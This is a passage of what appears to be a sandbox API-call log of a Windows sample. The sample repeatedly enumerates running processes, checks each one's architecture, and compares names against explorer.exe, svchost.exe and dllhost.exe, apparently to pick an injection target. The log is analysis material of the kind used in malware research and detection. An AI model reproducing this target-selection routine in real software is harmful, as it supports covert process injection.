Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.445] CloseHandle (hObject=0xd8) returned 1 [0251.445] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0251.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0251.446] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.446] CloseHandle (hObject=0xd8) returned 1 [0251.446] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0251.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0251.446] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.446] CloseHandle (hObject=0xd8) returned 1 [0251.446] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0251.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0251.447] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.447] CloseHandle (hObject=0xd8) returned 1 [0251.447] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0251.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0251.447] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.447] CloseHandle (hObject=0xd8) returned 1 [0251.447] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0251.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0251.448] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.448] CloseHandle (hObject=0xd8) returned 1 [0251.448] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0251.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0251.448] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.448] CloseHandle (hObject=0xd8) returned 1 [0251.449] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0251.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0251.449] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.449] CloseHandle (hObject=0xd8) returned 1 [0251.449] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0251.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0251.450] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.450] CloseHandle (hObject=0xd8) returned 1 [0251.450] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0251.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0251.451] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.451] CloseHandle (hObject=0xd8) returned 1 [0251.451] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0251.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0251.451] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.451] CloseHandle (hObject=0xd8) returned 1 [0251.451] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0251.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0251.452] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.452] CloseHandle (hObject=0xd8) returned 1 [0251.452] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0251.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0251.452] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.452] CloseHandle (hObject=0xd8) returned 1 [0251.452] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0251.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0251.453] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.453] CloseHandle (hObject=0xd8) returned 1 [0251.453] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0251.454] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0251.454] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0251.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0251.455] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0251.455] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0251.456] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.456] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0251.456] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.456] CloseHandle (hObject=0xd8) returned 1 [0251.456] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0251.456] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0251.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0251.457] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.457] CloseHandle (hObject=0xd8) returned 1 [0251.457] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0251.457] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0251.457] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0251.457] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0251.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0251.457] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0251.458] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.458] CloseHandle (hObject=0xd8) returned 1 [0251.458] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0251.458] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.458] CloseHandle (hObject=0xd8) returned 1 [0251.458] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0251.458] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0251.459] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0251.459] CloseHandle (hObject=0xd8) returned 1 [0251.459] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.460] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0251.460] CloseHandle (hObject=0xd4) returned 1 [0251.460] Sleep (dwMilliseconds=0x3e8) [0252.471] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0252.473] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.473] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0252.473] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0252.474] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.474] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0252.474] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0252.475] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0252.475] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0252.475] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0252.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0252.476] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0252.476] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0252.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0252.477] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0252.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0252.477] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0252.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0252.478] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0252.478] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0252.479] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0252.479] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0252.480] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0252.480] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0252.481] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.481] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0252.481] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0252.482] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.482] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0252.482] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.482] CloseHandle (hObject=0xd8) returned 1 [0252.482] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0252.483] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0252.483] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0252.483] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0252.483] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0252.484] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.484] CloseHandle (hObject=0xd8) returned 1 [0252.484] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0252.484] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0252.484] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0252.484] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.484] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0252.484] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0252.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0252.485] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0252.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0252.485] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.485] CloseHandle (hObject=0xd8) returned 1 [0252.485] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0252.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0252.486] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.486] CloseHandle (hObject=0xd8) returned 1 [0252.486] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0252.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0252.486] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0252.486] CloseHandle (hObject=0xd8) returned 1 [0252.487] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0252.487] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0252.487] 